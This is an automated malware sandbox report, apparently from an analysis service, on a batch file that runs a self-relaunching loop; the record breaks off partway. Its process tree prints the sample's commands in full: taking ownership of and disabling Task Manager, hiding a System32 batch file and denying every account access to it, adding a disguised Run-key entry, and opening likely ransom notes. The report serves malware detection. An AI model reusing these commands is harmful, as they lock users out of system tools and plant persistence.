3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf

Resubmissions

28/03/2025, 23:13

250328-27d4aavpy6 8

28/03/2025, 23:11

250328-26lrqsvpx2 8

Analysis

max time kernel
2s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mainversion.bat
Size

3KB
MD5

97422af7164bd8af68e3ff991ed685a5
SHA1

46f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4
SHA256

3e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf
SHA512

72a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e

Score

8^/10

defense_evasion discovery exploit persistence

Malware Config

Signatures

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
1808	icacls.exe
1716	takeown.exe
4812	icacls.exe
7720	icacls.exe
9312	Process not Found
2912	Process not Found
2336	icacls.exe
7004	icacls.exe
9148	icacls.exe
6440	icacls.exe
6440	icacls.exe
8768	Process not Found
10996	Process not Found
13544	Process not Found
2548	icacls.exe
2012	icacls.exe
9432	Process not Found
12264	Process not Found
1748	icacls.exe
1072	Process not Found
1312	icacls.exe
744	takeown.exe
6288	icacls.exe
6320	icacls.exe
6524	icacls.exe
4212	icacls.exe
6204	icacls.exe
3060	icacls.exe
5040	icacls.exe
6048	icacls.exe
4956	icacls.exe
5820	icacls.exe
844	icacls.exe
8	icacls.exe
6852	takeown.exe
10852	Process not Found
6312	icacls.exe
1152	icacls.exe
1028	icacls.exe
844	icacls.exe
10840	Process not Found
1316	Process not Found
2912	Process not Found
5332	icacls.exe
5504	icacls.exe
4488	takeown.exe
9888	Process not Found
9800	Process not Found
4556	Process not Found
5772	icacls.exe
5212	takeown.exe
6916	takeown.exe
6616	icacls.exe
5800	icacls.exe
764	icacls.exe
11568	Process not Found
2040	icacls.exe
6296	icacls.exe
2372	icacls.exe
8260	Process not Found
1204	icacls.exe
7292	icacls.exe
8832	icacls.exe
11200	Process not Found

Sets file to hidden 1 TTPs 42 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5288	attrib.exe
6828	attrib.exe
1840	attrib.exe
7684	attrib.exe
7336	attrib.exe
5232	attrib.exe
7288	attrib.exe
4616	attrib.exe
1664	attrib.exe
6680	Process not Found
6768	Process not Found
3680	attrib.exe
1936	attrib.exe
5384	attrib.exe
5276	attrib.exe
3084	Process not Found
12364	Process not Found
4404	attrib.exe
5656	attrib.exe
5344	Process not Found
4244	attrib.exe
3572	attrib.exe
3484	attrib.exe
8880	attrib.exe
4228	Process not Found
6848	Process not Found
12356	Process not Found
3856	attrib.exe
5016	attrib.exe
7552	attrib.exe
15716	Process not Found
5812	attrib.exe
6248	attrib.exe
3680	attrib.exe
11680	Process not Found
14512	Process not Found
6324	attrib.exe
3484	attrib.exe
428	attrib.exe
12956	Process not Found
13848	Process not Found
6040	Process not Found

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	cscript.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error.bat	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5228	takeown.exe
764	icacls.exe
4668	icacls.exe
4956	icacls.exe
4944	icacls.exe
3324	icacls.exe
1028	icacls.exe
3724	icacls.exe
10084	Process not Found
3260	Process not Found
4500	icacls.exe
6288	icacls.exe
6128	icacls.exe
4480	icacls.exe
2168	Process not Found
6904	takeown.exe
7628	takeown.exe
15484	Process not Found
5244	icacls.exe
6300	icacls.exe
3840	icacls.exe
5952	icacls.exe
2540	icacls.exe
5168	icacls.exe
10840	Process not Found
12456	Process not Found
5800	icacls.exe
4664	icacls.exe
3896	icacls.exe
7672	icacls.exe
7720	icacls.exe
9888	Process not Found
5088	icacls.exe
6264	icacls.exe
9148	icacls.exe
12828	Process not Found
10036	Process not Found
1600	icacls.exe
6320	icacls.exe
2548	icacls.exe
8392	Process not Found
9640	Process not Found
14636	Process not Found
2620	icacls.exe
2844	icacls.exe
7360	icacls.exe
6440	icacls.exe
2336	icacls.exe
5544	icacls.exe
5340	takeown.exe
1852	takeown.exe
9128	icacls.exe
7008	Process not Found
13720	Process not Found
14432	Process not Found
3160	icacls.exe
8636	icacls.exe
14960	Process not Found
15400	Process not Found
1868	icacls.exe
1688	icacls.exe
7188	icacls.exe
552	Process not Found
14352	Process not Found

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Windows\\System32\\flare.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Windows\\System32\\flare.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Windows\\System32\\flare.bat"	reg.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\System32\flare.bat	cmd.exe
File created	C:\Windows\System32\flare_helper.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare_helper.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	attrib.exe
File opened for modification	C:\Windows\System32\flare_helper.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	attrib.exe
File opened for modification	C:\Windows\System32\flare_helper.bat	cmd.exe
File opened for modification	C:\Windows\System32\flare.bat	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 64 IoCs

defense_evasion

pid	Process
9868	Process not Found
13400	Process not Found
11004	Process not Found
6300	Process not Found
5064	Process not Found
15536	Process not Found
15440	Process not Found
1660	timeout.exe
11456	Process not Found
3484	timeout.exe
10840	Process not Found
8776	Process not Found
15132	Process not Found
2500	timeout.exe
12048	Process not Found
12956	Process not Found
14124	Process not Found
16032	Process not Found
5788	timeout.exe
8376	timeout.exe
8252	Process not Found
12348	Process not Found
13336	Process not Found
6620	timeout.exe
8272	timeout.exe
8664	timeout.exe
12484	Process not Found
15440	Process not Found
6724	Process not Found
10164	Process not Found
10600	Process not Found
11568	Process not Found
14464	Process not Found
15696	Process not Found
6948	timeout.exe
8472	timeout.exe
5868	Process not Found
10048	Process not Found
1068	Process not Found
12176	Process not Found
10060	Process not Found
13668	Process not Found
15132	Process not Found
7320	timeout.exe
8472	timeout.exe
14588	Process not Found
9924	Process not Found
5396	Process not Found
716	Process not Found
1316	Process not Found
6424	timeout.exe
8784	Process not Found
7036	timeout.exe
4996	timeout.exe
5164	timeout.exe
5992	timeout.exe
7420	timeout.exe
9332	Process not Found
12868	Process not Found
13936	Process not Found
14784	Process not Found
8356	timeout.exe
13916	Process not Found
10112	Process not Found

Kills process with taskkill 22 IoCs

defense_evasion

pid	Process
6876	taskkill.exe
7264	taskkill.exe
4668	taskkill.exe
5396	Process not Found
11636	Process not Found
14412	Process not Found
4136	taskkill.exe
4472	taskkill.exe
5184	taskkill.exe
5084	taskkill.exe
11160	Process not Found
1336	Process not Found
1072	taskkill.exe
1932	taskkill.exe
5992	taskkill.exe
15468	Process not Found
2112	taskkill.exe
7552	taskkill.exe
8332	taskkill.exe
1524	Process not Found
4500	taskkill.exe
1072	taskkill.exe

Opens file in notepad (likely ransom note) 42 IoCs

ransomware

pid	Process
13180	Process not Found
14232	Process not Found
14012	Process not Found
5584	notepad.exe
4500	notepad.exe
5836	notepad.exe
9180	notepad.exe
820	Process not Found
744	notepad.exe
764	notepad.exe
3444	notepad.exe
4476	notepad.exe
7708	notepad.exe
2332	notepad.exe
5092	notepad.exe
3548	notepad.exe
5340	notepad.exe
1960	notepad.exe
7960	notepad.exe
5696	notepad.exe
1412	notepad.exe
5644	notepad.exe
2596	notepad.exe
11132	Process not Found
7008	Process not Found
14740	Process not Found
15828	Process not Found
4040	notepad.exe
11944	Process not Found
9264	Process not Found
3844	notepad.exe
6344	notepad.exe
5288	notepad.exe
7388	notepad.exe
13908	Process not Found
5176	notepad.exe
2404	notepad.exe
5268	notepad.exe
7176	notepad.exe
1680	Process not Found
2368	Process not Found
13248	Process not Found

Runs net.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	4136	taskkill.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeTakeOwnershipPrivilege	3296	takeown.exe
Token: SeDebugPrivilege	4472	taskkill.exe
Token: SeTakeOwnershipPrivilege	3260	takeown.exe
Token: SeTakeOwnershipPrivilege	2956	takeown.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeTakeOwnershipPrivilege	8	takeown.exe
Token: SeTakeOwnershipPrivilege	1312	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 3176	3912	cmd.exe	88
PID 3912 wrote to memory of 3176	3912	cmd.exe	88
PID 3912 wrote to memory of 1988	3912	cmd.exe	159
PID 3912 wrote to memory of 1988	3912	cmd.exe	159
PID 1988 wrote to memory of 2448	1988	net.exe	90
PID 1988 wrote to memory of 2448	1988	net.exe	90
PID 3912 wrote to memory of 4136	3912	cmd.exe	91
PID 3912 wrote to memory of 4136	3912	cmd.exe	91
PID 3912 wrote to memory of 4812	3912	cmd.exe	93
PID 3912 wrote to memory of 4812	3912	cmd.exe	93
PID 3912 wrote to memory of 3296	3912	cmd.exe	94
PID 3912 wrote to memory of 3296	3912	cmd.exe	94
PID 3912 wrote to memory of 4500	3912	cmd.exe	223
PID 3912 wrote to memory of 4500	3912	cmd.exe	223
PID 3912 wrote to memory of 2012	3912	cmd.exe	96
PID 3912 wrote to memory of 2012	3912	cmd.exe	96
PID 3912 wrote to memory of 5016	3912	cmd.exe	97
PID 3912 wrote to memory of 5016	3912	cmd.exe	97
PID 3912 wrote to memory of 1868	3912	cmd.exe	98
PID 3912 wrote to memory of 1868	3912	cmd.exe	98
PID 3912 wrote to memory of 5096	3912	cmd.exe	99
PID 3912 wrote to memory of 5096	3912	cmd.exe	99
PID 3912 wrote to memory of 3324	3912	cmd.exe	269
PID 3912 wrote to memory of 3324	3912	cmd.exe	269
PID 3912 wrote to memory of 764	3912	cmd.exe	101
PID 3912 wrote to memory of 764	3912	cmd.exe	101
PID 3912 wrote to memory of 2944	3912	cmd.exe	104
PID 3912 wrote to memory of 2944	3912	cmd.exe	104
PID 3912 wrote to memory of 2332	3912	cmd.exe	105
PID 3912 wrote to memory of 2332	3912	cmd.exe	105
PID 3912 wrote to memory of 2708	3912	cmd.exe	106
PID 3912 wrote to memory of 2708	3912	cmd.exe	106
PID 3912 wrote to memory of 844	3912	cmd.exe	107
PID 3912 wrote to memory of 844	3912	cmd.exe	107
PID 3912 wrote to memory of 1272	3912	cmd.exe	887
PID 3912 wrote to memory of 1272	3912	cmd.exe	887
PID 3912 wrote to memory of 2620	3912	cmd.exe	178
PID 3912 wrote to memory of 2620	3912	cmd.exe	178
PID 3912 wrote to memory of 3576	3912	cmd.exe	110
PID 3912 wrote to memory of 3576	3912	cmd.exe	110
PID 3912 wrote to memory of 1808	3912	cmd.exe	111
PID 3912 wrote to memory of 1808	3912	cmd.exe	111
PID 3912 wrote to memory of 3120	3912	cmd.exe	112
PID 3912 wrote to memory of 3120	3912	cmd.exe	112
PID 3912 wrote to memory of 4148	3912	cmd.exe	113
PID 3912 wrote to memory of 4148	3912	cmd.exe	113
PID 3912 wrote to memory of 1952	3912	cmd.exe	115
PID 3912 wrote to memory of 1952	3912	cmd.exe	115
PID 3912 wrote to memory of 428	3912	cmd.exe	116
PID 3912 wrote to memory of 428	3912	cmd.exe	116
PID 3912 wrote to memory of 3844	3912	cmd.exe	117
PID 3912 wrote to memory of 3844	3912	cmd.exe	117
PID 3912 wrote to memory of 2844	3912	cmd.exe	186
PID 3912 wrote to memory of 2844	3912	cmd.exe	186
PID 2844 wrote to memory of 4284	2844	cscript.exe	119
PID 2844 wrote to memory of 4284	2844	cscript.exe	119
PID 3912 wrote to memory of 4632	3912	cmd.exe	964
PID 3912 wrote to memory of 4632	3912	cmd.exe	964
PID 3912 wrote to memory of 4404	3912	cmd.exe	122
PID 3912 wrote to memory of 4404	3912	cmd.exe	122
PID 4284 wrote to memory of 3784	4284	cmd.exe	123
PID 4284 wrote to memory of 3784	4284	cmd.exe	123
PID 3784 wrote to memory of 3932	3784	cmd.exe	245
PID 3784 wrote to memory of 3932	3784	cmd.exe	245

Views/modifies file attributes 1 TTPs 42 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5016	attrib.exe
8880	attrib.exe
4228	Process not Found
6848	Process not Found
12364	Process not Found
14512	Process not Found
3572	attrib.exe
3680	attrib.exe
1664	attrib.exe
7684	attrib.exe
3084	Process not Found
6768	Process not Found
428	attrib.exe
5344	Process not Found
12356	Process not Found
4244	attrib.exe
4616	attrib.exe
5276	attrib.exe
6828	attrib.exe
7336	attrib.exe
5232	attrib.exe
6680	Process not Found
12956	Process not Found
3680	attrib.exe
4404	attrib.exe
15716	Process not Found
5656	attrib.exe
3484	attrib.exe
1840	attrib.exe
6248	attrib.exe
6324	attrib.exe
13848	Process not Found
6040	Process not Found
3856	attrib.exe
5812	attrib.exe
5288	attrib.exe
5384	attrib.exe
3484	attrib.exe
7288	attrib.exe
7552	attrib.exe
11680	Process not Found
1936	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mainversion.bat"
1⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Windows\system32\msg.exe
  msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
  2⤵
  PID:3176
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2448
- C:\Windows\system32\taskkill.exe
  taskkill /f /im taskmgr.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\System32\taskmgr.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4812
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\SysWOW64\taskmgr.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
  2⤵
  - Modifies file permissions
  PID:4500
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2012
- C:\Windows\system32\attrib.exe
  attrib +s +h +r "C:\Windows\System32\flare.bat"
  2⤵
  - Sets file to hidden
  - Drops file in System32 directory
  - Views/modifies file attributes
  PID:5016
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
  2⤵
  PID:1868
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
  2⤵
  PID:5096
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
  2⤵
  PID:3324
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
  2⤵
  - Adds Run key to start application
  PID:764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2944
- C:\Windows\system32\notepad.exe
  notepad "C:\Users\Admin\Desktop\flare_warning.txt"
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2332
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
  2⤵
  PID:2708
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
  2⤵
  - Possible privilege escalation attempt
  PID:844
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
  2⤵
  PID:1272
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
  2⤵
  - Modifies file permissions
  PID:2620
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
  2⤵
  PID:3576
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
  2⤵
  PID:3120
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
  2⤵
  PID:4148
- C:\Windows\system32\icacls.exe
  icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
  2⤵
  PID:1952
- C:\Windows\system32\attrib.exe
  attrib +s +h "C:\Users\Admin\Desktop\LPT2"
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:428
- C:\Windows\system32\notepad.exe
  notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3844
- C:\Windows\system32\cscript.exe
  cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
      4⤵
      Drops startup file
      Drops file in System32 directory
      Suspicious use of WriteProcessMemory
      PID:3784
    - - C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        5⤵
        
        PID:3932
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:4028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:4244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3260
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        5⤵
        Modifies file permissions
        
        PID:3160
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        5⤵
        
        PID:3276
    - - C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        5⤵
        Sets file to hidden
        Drops file in System32 directory
        Views/modifies file attributes
        
        PID:3680
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        5⤵
        
        PID:2172
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        5⤵
        
        PID:4580
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2336
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        5⤵
        Adds Run key to start application
        
        PID:2748
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe
        5⤵
        
        PID:516
    - - C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:2596
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        5⤵
        Possible privilege escalation attempt
        
        PID:5040
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        5⤵
        Possible privilege escalation attempt
        
        PID:2372
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        5⤵
        Modifies file permissions
        
        PID:3896
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        5⤵
        
        PID:3600
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        5⤵
        
        PID:4000
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        5⤵
        
        PID:2168
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        5⤵
        
        PID:2100
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        5⤵
        
        PID:3984
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        5⤵
        
        PID:4616
    - - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1840
    - - C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:1412
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        5⤵
        Checks computer location settings
        
        PID:2820
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        6⤵
        
        PID:4448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        7⤵
        Drops startup file
        Drops file in System32 directory
        
        PID:1988
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        8⤵
        
        PID:4668
        
        C:\Windows\system32\net.exe
        
        net session
        8⤵
        
        PID:3296
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        9⤵
        
        PID:3500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        8⤵
        Modifies file permissions
        
        PID:1868
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:764
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        8⤵
        Sets file to hidden
        Drops file in System32 directory
        Views/modifies file attributes
        
        PID:3856
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        8⤵
        
        PID:632
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        8⤵
        
        PID:3876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        8⤵
        
        PID:1284
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        8⤵
        Adds Run key to start application
        
        PID:1272
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        8⤵
        
        PID:2284
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        8⤵
        Opens file in notepad (likely ransom note)
        
        PID:4040
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        8⤵
        
        PID:3824
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        8⤵
        
        PID:436
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        8⤵
        
        PID:1084
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        8⤵
        
        PID:1956
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        8⤵
        Modifies file permissions
        
        PID:2844
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        8⤵
        Modifies file permissions
        
        PID:4480
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        8⤵
        
        PID:2940
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        8⤵
        
        PID:3544
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        8⤵
        Modifies file permissions
        
        PID:3724
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4244
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        8⤵
        Opens file in notepad (likely ransom note)
        
        PID:4476
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        8⤵
        
        PID:3744
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        9⤵
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        10⤵
        
        PID:656
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        11⤵
        
        PID:4036
        
        C:\Windows\system32\net.exe
        
        net session
        11⤵
        
        PID:1748
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        12⤵
        
        PID:2860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        11⤵
        Kills process with taskkill
        
        PID:2112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        11⤵
        
        PID:780
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        11⤵
        Possible privilege escalation attempt
        
        PID:4488
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        11⤵
        
        PID:4520
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        11⤵
        
        PID:2752
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        11⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3572
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        11⤵
        Possible privilege escalation attempt
        
        PID:1028
        
        C:\Windows\system32\icacls.exe
        
